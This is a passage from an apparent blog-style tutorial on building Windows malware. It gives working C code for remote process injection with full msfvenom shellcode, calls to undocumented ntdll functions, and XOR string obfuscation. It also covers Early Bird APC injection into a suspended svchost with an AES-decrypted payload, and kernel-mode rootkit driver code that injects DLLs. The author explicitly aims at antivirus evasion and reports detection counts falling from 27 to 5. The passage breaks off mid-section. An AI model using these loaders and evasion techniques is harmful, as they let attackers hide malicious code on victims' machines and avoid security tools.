IN ULONG SizeOfStackCommit,
IN ULONG SizeOfStackReserve,
OUT LPVOID lpBytesBuffer
);
HANDLE bCreateRemoteThread(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {
HANDLE hRemoteThread = NULL;
LPVOID ntCreateThreadExAddr = NULL;
NtCreateThreadExBuffer ntbuffer;
DWORD temp1 = 0;
DWORD temp2 = 0;
ntCreateThreadExAddr = GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtCreateThreadEx");
if( ntCreateThreadExAddr ) {
ntbuffer.Size = sizeof(struct NtCreateThreadExBuffer);
ntbuffer.Unknown1 = 0x10003;
ntbuffer.Unknown2 = 0x8;
ntbuffer.Unknown3 = &temp2;
ntbuffer.Unknown4 = 0;
ntbuffer.Unknown5 = 0x10004;
ntbuffer.Unknown6 = 4;
ntbuffer.Unknown7 = &temp1;
ntbuffer.Unknown8 = 0;
LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr;
NTSTATUS status = funNtCreateThreadEx(
&hRemoteThread,
0x1FFFFF,
NULL,
hHandle,
(LPTHREAD_START_ROUTINE)loadLibAddr,
dllPathAddr,
FALSE,
NULL,
NULL,
NULL,
&ntbuffer
);
if (hRemoteThread == NULL) {
printf("\t[!] NtCreateThreadEx Failed! [%d][%08x]\n", GetLastError(), status);
return NULL;
} else {
return hRemoteThread;
}
} else {
printf("\n[!] Could not find NtCreateThreadEx!\n");
}
return NULL;
}
Now we can call it very much like CreateRemoteThread():
rThread = bCreateRemoteThread(hTargetProcHandle, lpStartExecAddr, lpExecParam);
WaitForSingleObject(rThread, INFINITE);
So far, we’ve covered how to manipulate processes, inject DLLs, and replace legitimate code with malicious payloads. But what if we want to execute custom, low-level code directly in memory without relying on external files or DLLs? This is where shellcode comes into play.
Shellcode Execution
Shellcode is a small piece of code that performs a specific task. It’s often used in exploits, post-exploitation activities, and malware to execute commands, spawn shells, or perform other actions directly in memory. Unlike DLLs or executables, shellcode doesn’t rely on the file system. The workflow has three steps:
- Generate shellcode
- Inject shellcode
- Execute shellcode
What is Shellcode?
Shellcode is a sequence of machine instructions that perform a specific task, such as opening a reverse shell, downloading and executing a payload, or modifying system settings. It’s typically written in assembly language and compiled into raw binary format, making it lightweight and easy to inject into processes.
Shellcode is often used in conjunction with techniques like buffer overflows, process injection, or return-oriented programming (ROP) to achieve code execution in a target process.
Sounds good, so check this out:
int main(void){
STARTUPINFOW si = {0};
PROCESS_INFORMATION pi = {0};
if(!CreateProcessW(
L"C:\\Windows\\System32\\notepad.exe",
NULL,
NULL,
NULL,
FALSE,
BELOW_NORMAL_PRIORITY_CLASS,
NULL,
NULL,
&si,
&pi
)){
printf("(-) failed to create process, error: %ld", GetLastError());
return EXIT_FAILURE;
}
printf("(+) process started! PID:%ld", pi.dwProcessId);
return EXIT_SUCCESS;
}
What’s the purpose of this code, you may wonder? You likely have an inkling already: we’re starting a fresh Notepad process. There’s nothing shady about this code; it’s entirely above board and legitimate. We’re using the CreateProcessW function, which controls precisely how a new process is launched. You provide it with a set of parameters, and voilà, a new process comes to life.
BOOL CreateProcessW(
[in, optional] LPCWSTR lpApplicationName,
[in, out, optional] LPWSTR lpCommandLine,
[in, optional] LPSECURITY_ATTRIBUTES lpProcessAttributes,
[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes,
[in] BOOL bInheritHandles,
[in] DWORD dwCreationFlags,
[in, optional] LPVOID lpEnvironment,
[in, optional] LPCWSTR lpCurrentDirectory,
[in] LPSTARTUPINFOW lpStartupInfo,
[out] LPPROCESS_INFORMATION lpProcessInformation
);
Now, let’s take a deeper look into our coding journey. We’re not inventing something entirely new; instead, we’re refining existing code droppers and loaders for Windows targets, making them responsive to our session commands.
Our goal here is to run unrestricted shellcode. Our toolkit includes familiar Windows API functions: ‘OpenProcess,’ ‘VirtualAllocEx,’ ‘WriteProcessMemory,’ and ‘CreateRemoteThread.’ Think of it as conducting an orchestra, where each function plays a specific role in enabling the shellcode to do its job. We’re in charge, and the Windows targets should be ready to follow our instructions.
int main()
{
STARTUPINFOW si = {0};
PROCESS_INFORMATION pi = {0};
(!CreateProcessW(
L"C:\\Windows\\System32\\notepad.exe",
NULL,
NULL,
NULL,
FALSE,
BELOW_NORMAL_PRIORITY_CLASS,
NULL,
NULL,
&si,
&pi
));
char shellcode[] ={
};
HANDLE hProcess;
HANDLE hThread;
void*exec_mem;
hProcess = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pi.dwProcessId);
exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, exec_mem, shellcode, sizeof(shellcode), NULL);
hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL,0,0);
CloseHandle(hProcess);
return 0;
}
Alright, do you notice any differences? Bingo, there’s “shellcode.” Let me clarify; the initial code segment was simple, mainly focusing on creating a new process (Notepad) and adjusting its priority class. However, the code we’re dealing with now is more sinister, as it centers around remote process injection and the implementation of functions such as OpenProcess
, VirtualAllocEx
, WriteProcessMemory
, and CreateRemoteThread
to allocate memory within a target process and execute custom shellcode within it.
Nevertheless, plaintext Metasploit (msf) shellcode tends to raise red flags and is susceptible to detection by antivirus engines. In the preceding section, we delved into shellcode development, particularly emphasizing a reverse shell. Yet, this code is simpler and can be swiftly pinpointed by antivirus engines. So, let’s explore an alternative strategy how about encoding the shellcode into Read-Write-Execute (RWX) memory to initiate Notepad?
Alright, RWX memory implementation is fairly straightforward for our intended purpose. It involves searching a process’s private virtual memory space (the userland virtual memory space) for a memory section marked as PAGE_EXECUTE_READWRITE. If such a space is found, it’s returned. If not, the next search address is adjusted to the subsequent memory region (BaseAddress + Memory Region).
To finalize this for code execution, our shellcode must then be relocated to that discovered memory region and executed. An efficient way to achieve this is to resort to WinAPI calls, similar to what we demonstrated in the first technique. However, it’s essential to consider the cons of that approach, as discussed above.
int main(int argc, char * argv[])
{
// msfvenom -p windows/x64/exec CMD=notepad.exe -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
int newPid = atoi(argv[1]);
printf("Injecting into pid %d\n", newPid);
HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);
if (!pHandle)
{
printf("Invalid Handle\n");
exit(1);
}
LPVOID remoteBuf = VirtualAllocEx(pHandle, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!remoteBuf)
{
printf("Alloc Fail\n");
exit(1);
}
printf("alloc addr: %p\n", remoteBuf);
WriteProcessMemory(pHandle, remoteBuf, shellcode, sizeof(shellcode), NULL);
CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuf, NULL, 0, NULL);
return 0;
}
Let’s try to move away from them and directly use the undocumented functions within ntdll.dll
. In this one we go a level lower, calling the Native API functions that sit directly above the syscalls.
We need:
- NtAllocateVirtualMemory
- NtWriteVirtualMemory
- NtCreateThreadEx
Since these APIs are not documented by Microsoft, we need to find some external references, such as http://undocumented.ntinternals.net.
Let’s look at the definition of an NTAPI
function from the reference link:
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect );
NTSTATUS
is the actual return value, while NTSYSAPI
marks the function as a library import and NTAPI
defines the Windows API calling convention. IN
means the function requires it as input, while OUT
means that the parameter passed in is modified with some return output.
When we prototype the functions, we just need to note the NTAPI
part.
In fact you can also use WINAPI
since both of them resolve to __stdcall
.
typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);
Here we prototype some function pointers that we’ll map the address of the actual functions in ntdll.dll
to later. You might notice that some types are also missing, for example the POBJECT_ATTRIBUTES
, so let’s find and define them from the references.
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _PS_ATTRIBUTE {
ULONG Attribute;
SIZE_T Size;
union {
ULONG Value;
PVOID ValuePtr;
} u1;
PSIZE_T ReturnLength;
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
typedef struct _PS_ATTRIBUTE_LIST
{
SIZE_T TotalLength;
PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
Now let’s load ntdll.dll
and map the functions.
HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");
if (!hNtdll)
{
printf("Load ntdll fail\n");
exit(1);
}
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");
Finally we can call these functions.
typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);
int main(int argc, char * argv[])
{
// msfvenom -p windows/x64/exec CMD=notepad.exe -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
int newPid = atoi(argv[1]);
printf("Injecting into pid %d\n", newPid);
HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);
if (!pHandle)
{
printf("Invalid Handle\n");
exit(1);
}
HANDLE tHandle;
HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");
if (!hNtdll)
{
printf("Load ntdll fail\n");
exit(1);
}
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");
void * allocAddr = NULL;
SIZE_T allocSize = sizeof(shellcode);
NTSTATUS status;
status = NtAllocateVirtualMemory(pHandle, &allocAddr, 0, (PULONG)&allocSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
printf("status alloc: %X\n", status);
printf("alloc addr: %p\n", allocAddr);
status = NtWriteVirtualMemory(pHandle, allocAddr, shellcode, sizeof(shellcode), NULL);
printf("status write: %X\n", status);
status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, NULL, pHandle, allocAddr, NULL, 0, 0, 0, 0, NULL);
printf("status exec: %X\n", status);
return 0;
}
So, if you decide to upload this to antivirus engines (which I don’t recommend, but the choice is yours), you may see or even more :
Like I said, MSF shellcode is a dead giveaway, but let’s switch things up and try something different. Time to dust off some classic techniques that never go out of style. I’m talking XOR encryption, a method you’re probably familiar with when it comes to encrypting shellcode.
When XOR encryption is used on shellcode, a key is carefully chosen to XOR each byte of the shellcode. To decrypt it, you just apply the same key again, XOR-ing each byte once more. This reverses the process and restores the original shellcode.
However, it’s worth noting that XOR encryption is child’s play for anyone who already knows the key. If you’re up for a challenge, check out the one I posted a while back, ReverseMe Cipher, which involves XOR encryption.
As a general rule, though, it’s smarter to combine XOR encryption with other techniques for added complexity.
So first we wanna remove strings and debug symbols, Running the command strings
on our exe reveals strings such as “NtCreateThreadEx”, which may lead to AV detection.
We can remove these strings by again XOR encrypting them and decrypting during runtime, First we start by the function responsible for encryption and decryption
unsigned char * rox(unsigned char *, int, int);
unsigned char * rox(unsigned char * data, int dataLen, int xor_key)
{
unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);
for (int i = 0; i < dataLen; i++)
output[i] = data[i] ^ xor_key;
return output;
}
This Function can be used for encryption and also be used for decryption by applying the same XOR operation. If you XOR the encrypted data with the same xor_key
, it will revert to the original data, just formats encrypted shellcode nicely so we can copy and paste, and we only need the encrypt function in our actual injector.
const char* ntdll_str = (const char*)ntdll;
const char* navm_str = (const char*)navm;
const char* nwvm_str = (const char*)nwvm;
const char* ncte_str = (const char*)ncte;
So like we said NtCreateThreadEx.” These strings can be indicative of the program’s functionality and may lead to antivirus (AV), One way to obfuscate these strings and make them less detectable is to XOR encrypt them, and then decrypt them during runtime when they are needed.
unsigned char ntdll_data[] = {0x3d, 0x27, 0x37, 0x3f, 0x3f, 0x7d, 0x37, 0x3f, 0x3f, 0x53};
unsigned char *ntdll = rox(ntdll_data, 10, 0x53);
Let’s use Virustotal again and check the detection rate.
Well, going from 27 detections down to 9 is indeed a notable improvement, but it’s essential to recognize that this level of evasion is still relatively basic, especially when relying on tools like msfvenom
to achieve our goals.
Alright, time for a new code injection technique: “Early Bird.” It was used by a group known as APT33. How does it work? Simply put, it takes advantage of the application threading process that happens when a program executes on a computer. In other words, attackers inject malware code into legitimate process threads in an effort to hide malicious code inside commonly seen and legitimate processes.
We’re going to use functions like VirtualAllocEx
, WriteProcessMemory
, QueueUserAPC
, CreateProcessW
, and ResumeThread
. This time, before injecting the shellcode, we employ an AES decryption routine. The decryption process uses the Cryptography API functions (starting with CryptAcquireContextW) to decrypt the payload using a predefined key.
int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
BOOL CryptAcquire = CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
if (CryptAcquire == false) {
//printf("CryptAcquireContextW Failed: %d\n", GetLastError());
return -1;
}
BOOL CryptCreate = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
if (CryptCreate == false) {
//printf("CryptCreateHash Failed: %d\n", GetLastError());
return -1;
}
BOOL CryptHash = CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);
if (CryptHash == false) {
//printf("CryptHashData Failed: %d\n", GetLastError());
return -1;
}
BOOL CryptDerive = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);
if (CryptDerive == false) {
//printf("CryptDeriveKey Failed: %d\n", GetLastError());
return -1;
}
BOOL Crypt_Decrypt = CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);
if (Crypt_Decrypt == false) {
//printf("CryptDecrypt Failed: %d\n", GetLastError());
return -1;
}
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
return 0;
}
The AES decryption routine ensures that the injected shellcode is in its original, unencrypted form, which is essential for executing it within the target process. This decryption process allows attackers to conceal the true nature of their payload until it is actively executed in the target process’s thread.
Next CreateProcessW
pfnCreateProcessW pCreateProcessW = (pfnCreateProcessW)GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "CreateProcessW");
if (pCreateProcessW == NULL) {
// Handle error if the function cannot be found
}
STARTUPINFOW si;
PROCESS_INFORMATION pi;
// Clear out startup and process info structures
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si;
RtlSecureZeroMemory(&pi, sizeof(pi));
std::wstring pName = L"C:\\Windows\\System32\\svchost.exe";
HANDLE pHandle = NULL;
HANDLE hThread = NULL;
DWORD Pid = 0;
BOOL cProcess = pCreateProcessW(NULL, &pName[0], NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
The CreateProcessW
function is invoked to create a new process, which, in this case, is intended to execute the svchost.exe
application. However, a critical detail here is CREATE_SUSPENDED
, a creation flag passed in dwCreationFlags (not a Boolean set to TRUE) that starts the new process with its main thread suspended. After successfully creating the suspended process, the code retrieves the process and thread handles. These handles are crucial for further manipulation of the newly created process.
pHandle = pi.hProcess;
hThread = pi.hThread;
Pid = pi.dwProcessId;
With the suspended process and its associated handles in place, we are now ready to proceed with the code injection, which involves injecting shellcode into the memory space of the newly created process.
Creating a suspended process provides an ideal opportunity to inject code and manipulate the process without raising immediate suspicion.
In the next steps, we will proceed to inject the shellcode into the suspended process, ultimately leading to its execution within the context of the target process’s thread. However, before injecting the shellcode, memory space is allocated within the target process to accommodate the injected code. This allocation is done using the VirtualAllocEx
function.
LPVOID memAlloc = pVirtualAllocEx(pHandle, 0, scSize, MEM_COMMIT, PAGE_EXECUTE_READ);
With the shellcode successfully injected into the target process’s memory, the code prepares for its execution. This is done using the QueueUserAPC
function, which enqueues the shellcode for execution within the context of a specific thread within the target process.
if (pQueueUserAPC((PAPCFUNC)memAlloc, hThread, NULL)) {
pResumeThread(hThread);
}
Now, let’s verify the success of our concealment strategy by injecting the shellcode into a suspended process and manipulating the memory space within the context of the process’s thread.
Among the initial 72 detections, we’ve successfully narrowed it down to just 5. We started with 27 detections, which dropped to 9, and now we’re down to only 5. Sure, we could keep going, and I’m confident we’ll eventually hit zero, but here’s the key takeaway: evasion doesn’t end here.
Evasion is just the beginning once you have a foothold in the system. The real challenge lies in how far you can move without triggering alarms or relying on well-known techniques in your arsenal, like Mimikatz. Once you’ve gained access and things start getting detected, the whole “undetected” part is compromised.
The trick? Having a diverse set of techniques in your arsenal. Don’t be an amateur. Just because an AV engine doesn’t detect your payload right away doesn’t mean you’re fully hidden. Keep that in mind.
Now that we’ve covered how to inject and execute code within a target process while evading detection, let’s take things a step further. A rootkit takes these techniques to the next level by embedding itself deep within the system, hiding its presence, and maintaining persistence. In this section, we’ll explore how to write a simple rootkit that hooks system calls, hides processes, and remains undetected.
A Rootkit?
A rootkit is a type of malware designed to hide its presence and maintain unauthorized access to a system. Unlike traditional malware, rootkits operate at a low level, often manipulating the operating system itself to conceal files, processes, and network activity.
Kernel mode rootkits operate at the highest privilege level, known as “Ring 0” in computer architecture. On the other hand, user mode rootkits run at “Ring 3,” which is a lower privilege level.
In order to grasp the workings of kernel mode rootkits, it is essential to have a solid grasp of the basics of Windows device drivers. Essentially, a device driver is a software component responsible for interfacing with hardware and managing Input/Output Request Packets (IRPs).
#include "ntddk.h"
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
DbgPrint("Hello World!");
return STATUS_SUCCESS;
}
This simple driver initializes and prints “Hello World!” to the kernel debugger. However, to perform more complex tasks, we need to understand IRPs.
Understanding I/O Request Packets (IRPs)
IRPs are data structures used to communicate between user-mode programs and kernel-mode drivers. When a user-mode program, for example, writes data to a file handle, the kernel creates an IRP to manage this operation.
To process IRPs effectively, a driver must define functions for handling them. In the provided code, we set up a basic dispatch function that completes the IRP with a success status. In reality, different functions would handle various IRP types.
NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
The driver sets up major function pointers, such as IRP_MJ_CREATE
, IRP_MJ_CLOSE
, IRP_MJ_READ
, IRP_MJ_WRITE
, and IRP_MJ_DEVICE_CONTROL
, to handle specific IRP types. In a comprehensive driver, separate functions would handle these major functions.
Creating a File Handle
File handles are essential for user-mode programs to interact with kernel drivers. In Windows, to use a kernel driver from user-mode, the user-mode program must open a file handle to the driver. The driver first registers a named device, and then the user-mode program opens it as if it were a file.
const WCHAR deviceNameBuffer[] = L"\\Device\\MyDevice";
PDEVICE_OBJECT g_RootkitDevice; // Global pointer to our device object
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);
ntStatus = IoCreateDevice(DriverObject, 0, &deviceNameUnicodeString, 0x00001234, 0, TRUE, &g_RootkitDevice);
// ...
}
This code registers a device named “MyDevice.” A user-mode program can open this device using a fully qualified path, e.g., \\\\Device\\MyDevice
. This file handle can be used with functions like ReadFile
and WriteFile
, which generate IRPs for communication.
Understanding the interaction between user-mode and kernel-mode through IRPs and file handles is essential when writing effective Windows device drivers, a core concept in the development of kernel mode rootkits.
Remember DLL Injection? Now, let’s explore how rootkits leverage it to inject malicious code or custom device drivers directly into the Windows kernel. By building on the device driver and rootkit concepts we’ve discussed, we can see how kernel-mode DLL injection plays a pivotal role in this process:
Kernel-Mode DLL
The process typically begins with the DriverEntry
function, which is the entry point for our driver. Here’s how we start:
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverobject, IN PUNICODE_STRING pRegister)
{
NTSTATUS st;
PsSetLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
pDriverobject->DriverUnload = (PDRIVER_UNLOAD)Unload;
return STATUS_SUCCESS;
}
In this code snippet, we employ the PsSetLoadImageNotifyRoutine
function to register an image load notification routine. This step is crucial as it allows us to monitor the loading of specific system DLLs, such as kernel32.dll
, into the kernel’s address space.
Plus, we assign the driver’s unload function (pDriverObject->DriverUnload
) to manage cleanup operations when the driver is unloaded. This ensures that any resources or callbacks registered during the driver’s lifecycle are properly released and handled.
Image Load Notification
Our monitoring process hinges on image load notifications. We need to identify when the system loads kernel32.dll
, a fundamental DLL for Windows operating systems. The LoadImageNotifyRoutine
function enables this monitoring.
VOID LoadImageNotifyRoutine(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo)
{
if (ImageName != NULL)
{
// Check if the loaded image matches the name of kernel32.dll
WCHAR kernel32Mask[] = L"*\\KERNEL32.DLL";
UNICODE_STRING kernel32us;
RtlInitUnicodeString(&kernel32us, kernel32Mask);
if (FsRtlIsNameInExpression(&kernel32us, ImageName, TRUE, NULL))
{
PKAPC Apc;
if (Hash.Kernel32dll == 0)
{
// Initialize the Hash structure and import the function addresses
Hash.Kernel32dll = (PVOID)pImageInfo->ImageBase;
Hash.pvLoadLibraryExA = (fnLoadLibraryExA)ResolveDynamicImport(Hash.Kernel32dll, SIRIFEF_LOADLIBRARYEXA_ADDRESS);
}
// Create an Asynchronous Procedure Call (APC) to initiate DLL injection
Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
if (Apc)
{
KeInitializeApc(Apc, KeGetCurrentThread(), 0, (PKKERNEL_ROUTINE)APCInjectorRoutine, 0, 0, KernelMode, 0);
KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
}
}
}
return;
}
The LoadImageNotifyRoutine
function plays a pivotal role in our DLL injection process. It checks if the ImageName
parameter is not NULL, ensuring that we are actively monitoring loaded images with names. Furthermore, we examine if the loaded image matches the name of kernel32.dll
.
If a match is found, we proceed with initializing the Hash
structure and creating an Asynchronous Procedure Call (APC) using the APCInjectorRoutine
. The APC serves as a mechanism to trigger the DLL injection process into a target process.
These code snippets are instrumental in monitoring and responding to the loading of kernel32.dll
and lay the groundwork for our upcoming discussion on kernel-mode DLL injection.
Unloading the Driver
Before we dive deeper into DLL injection, it’s important to first understand how the driver can be unloaded properly. This is achieved through the Unload
function.
VOID Unload(IN PDRIVER_OBJECT pDriverobject)
{
// Remove the image load notification routine
PsRemoveLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
}
Here, we use the PsRemoveLoadImageNotifyRoutine
function to unregister the previously registered image load notification routine.
DLL Injection
Our exploration of kernel-mode DLL injection is incomplete without understanding how the actual injection takes place. The DllInject
function is the key to achieving this.
NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS Peprocess, PETHREAD Pethread, BOOLEAN Alert)
{
HANDLE hProcess;
OBJECT_ATTRIBUTES oa = { sizeof(OBJECT_ATTRIBUTES) };
CLIENT_ID cidprocess = { 0 };
CHAR DllFormatPath[] = "C:\\foo.dll";
ULONG Size = strlen(DllFormatPath) + 1;
PVOID pvMemory = NULL;
cidprocess.UniqueProcess = ProcessId;
cidprocess.UniqueThread = 0;
// Open the target process
if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cidprocess)))
{
// Allocate virtual memory in the target process
if (NT_SUCCESS(ZwAllocateVirtualMemory(hProcess, &pvMemory, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
{
// Create an APC (Asynchronous Procedure Call) to load the DLL
KAPC_STATE KasState;
PKAPC Apc;
// Attach to the target process
KeStackAttachProcess(Peprocess, &KasState);
// Copy the DLL path to the target process's memory
strcpy(pvMemory, DllFormatPath);
// Detach from the target process
KeUnstackDetachProcess(&KasState);
// Allocate memory for the APC
Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
if (Apc)
{
// Initialize the APC with the appropriate routine and parameters
KeInitializeApc(Apc, Pethread, 0, (PKKERNEL_ROUTINE)APCKernelRoutine, 0, (PKNORMAL_ROUTINE)Hash.pvLoadLibraryExA, UserMode, pvMemory);
// Insert the APC into the thread's queue
KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
}
// Close the target process handle
ZwClose(hProcess);
}
return STATUS_NO_MEMORY;
}
The DllInject
